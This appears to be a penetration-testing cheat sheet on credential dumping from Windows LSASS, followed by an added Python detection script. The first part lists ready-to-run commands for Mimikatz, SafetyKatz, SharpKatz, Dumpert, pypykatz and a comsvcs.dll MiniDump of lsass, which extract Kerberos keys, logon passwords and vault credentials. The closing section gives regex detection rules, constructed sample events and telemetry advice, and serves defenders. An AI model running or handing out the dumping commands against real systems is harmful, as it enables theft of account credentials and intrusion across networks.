Credentials Dumping

LSASS

High chance of detection.

Kerberos encryption keys

LSASS uses the Kerberos SSP to provide different authentication methods. It is therefore possible to dump Kerberos encryption keys using sekurlsa::ekeys.

# Dump credentials on a local machine using Mimikatz.
Invoke-Mimikatz -Command '"sekurlsa::ekeys"' 

# Using SafetyKatz (Minidump of lsass and PELoader to run Mimikatz)
SafetyKatz.exe "sekurlsa::ekeys" 

# Dump credentials using SharpKatz (C# port of some of Mimikatz functionality).
SharpKatz.exe --Command ekeys

# Dump credentials using Dumpert (Direct System Calls and API unhooking)
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

# Using pypykatz (Mimikatz functionality in Python)
pypykatz.exe live lsa

# Using comsvcs.dll
tasklist /FI "IMAGENAME eq lsass.exe"
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <lsass process ID> C:\Users\Public\lsass.dmp full

Logon Passwords

This usually shows recently logged on user and computer credentials.

Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"' 

Vault

Enumerates vault credentials of scheduled tasks.

Invoke-Mimi -Command '"token::elevate" "vault::cred /patch"'
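
Detection side of the commands above, as an added example that is not part of the original page: a Python sketch that matches the command strings listed on this page against text taken from process-creation command lines or PowerShell script block logs. The event layout (host, text), the rule names and the sample events are assumptions constructed for illustration.

```python
import re

# Patterns derived only from the command lines listed on this page.
RULES = {
    "mimikatz-module": re.compile(
        r"\b(sekurlsa::(ekeys|logonpasswords)|vault::cred|token::elevate)\b", re.I),
    "sharpkatz-ekeys": re.compile(r"--Command\s+ekeys\b", re.I),
    "dumpert-dll": re.compile(
        r"rundll32(\.exe)?\s+\S*Outflank-Dumpert\.dll\s*,\s*Dump\b", re.I),
    "pypykatz-live": re.compile(r"pypykatz(\.exe)?\s+live\s+lsa\b", re.I),
    # Named groups capture the target PID and dump path for the responder.
    "comsvcs-minidump": re.compile(
        r"rundll32(\.exe)?\s+\S*comsvcs\.dll\s*,\s*MiniDump\s+"
        r"(?P<pid>\d+)\s+(?P<path>\S+)\s+full", re.I),
}


def scan(events):
    """Return one finding per (event, rule) match, with dump details if captured."""
    findings = []
    for ev in events:
        for name, rx in RULES.items():
            m = rx.search(ev["text"])
            if m:
                # groupdict() is empty for rules without named groups.
                findings.append({"host": ev["host"], "rule": name, **m.groupdict()})
    return findings


# Constructed sample events (hypothetical hosts and PID), not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS01", "text": r'tasklist /FI "IMAGENAME eq lsass.exe"'},
    {"host": "WS01", "text": r"rundll32.exe C:\windows\System32\comsvcs.dll, "
                             r"MiniDump 644 C:\Users\Public\lsass.dmp full"},
    {"host": "WS02", "text": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"host": "SRV03", "text": "powershell.exe Invoke-Mimikatz -Command '\"sekurlsa::ekeys\"'"},
    {"host": "SRV03", "text": r"SharpKatz.exe --Command ekeys"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

String matching like this only catches the tools when they are run under the names and arguments shown here. Process-access telemetry on lsass.exe (for example Sysmon Event ID 10) does not depend on the command line and is the more robust signal.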
